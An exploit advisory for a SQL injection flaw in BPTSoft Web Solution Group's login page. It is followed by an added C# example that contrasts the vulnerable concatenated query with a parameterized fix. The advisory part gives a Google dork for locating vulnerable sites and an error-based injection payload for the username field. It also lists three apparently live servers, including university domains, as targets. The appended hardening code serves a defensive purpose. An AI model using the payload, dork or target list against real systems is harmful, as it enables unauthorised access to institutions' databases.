BPTSoft Web Solution Group suffers from a remote SQL injection vulnerability.
############################### HUT CNIS #############################
# Exploit Title: BPTSoft Web Solution Group SQL INJECTION Vulnerability
# Date: [2012/1/1]
# Author: S.Azadi
# Google Dork: site:.ir intext:Copyright 2005-2009 BPTSoft Web Solution Group
# Vulnerability Type: SQL Injection
# Version: 2005-2009
#---------------------------------------------------------------------
Technical Details:
- SQL INJECTION:
There is an SQL injection vulnerability in Default.aspx, in the username textbox.
PoC:
http://sitename/Default.aspx || Enter in username textbox: ' and 1=convert(int,(select @@version))--
sample code for username textbox: ' and 1=convert(int,(select @@version))--
http://fish.ghec.ac.ir/Default.aspx
http://95.82.105.54/Default.aspx
http://salary.yazduni.ac.ir/Default.aspx
#
#
#
###########- HUT Center for Network and Information Security -##########
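
The query pattern that makes the username field injectable, next to its parameterized form. This is an added example, not code from the advisory or from the BPTSoft application; the class, method, table and column names (LoginQueries, Users, UserName, PasswordHash) and the 64-character limit are assumptions made for illustration.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical data-access helper for the login form on Default.aspx.
public static class LoginQueries
{
    // Vulnerable pattern (assumed): the textbox value is concatenated into the
    // statement text. A single quote in the username closes the string literal
    // and the remainder is parsed as SQL. When a convert(int, ...) on a string
    // value fails, SQL Server includes that value in the conversion error,
    // which is how the version string in the advisory's PoC becomes visible.
    public static object FindUserConcatenated(SqlConnection conn, string username)
    {
        string sql = "SELECT PasswordHash FROM Users WHERE UserName = '" + username + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return cmd.ExecuteScalar();
        }
    }

    // Hardened form: the statement text is constant and the username travels
    // as a typed parameter, so quotes and comment markers in it are compared
    // as data and never parsed as SQL.
    public static string FindUserParameterized(SqlConnection conn, string username)
    {
        const string sql = "SELECT PasswordHash FROM Users WHERE UserName = @userName";
        using (var cmd = new SqlCommand(sql, conn))
        {
            // Explicit type and size; 64 is an assumed column length.
            // Values longer than the declared size are truncated by the provider.
            cmd.Parameters.Add("@userName", SqlDbType.NVarChar, 64).Value =
                username ?? string.Empty;

            // Returns null when no row matches; the caller verifies the
            // submitted password against the stored hash.
            return cmd.ExecuteScalar() as string;
        }
    }
}
```

Separately from the query fix, serving a generic error page (for example `<customErrors mode="On" />` in web.config) keeps SQL Server error text from reaching the client.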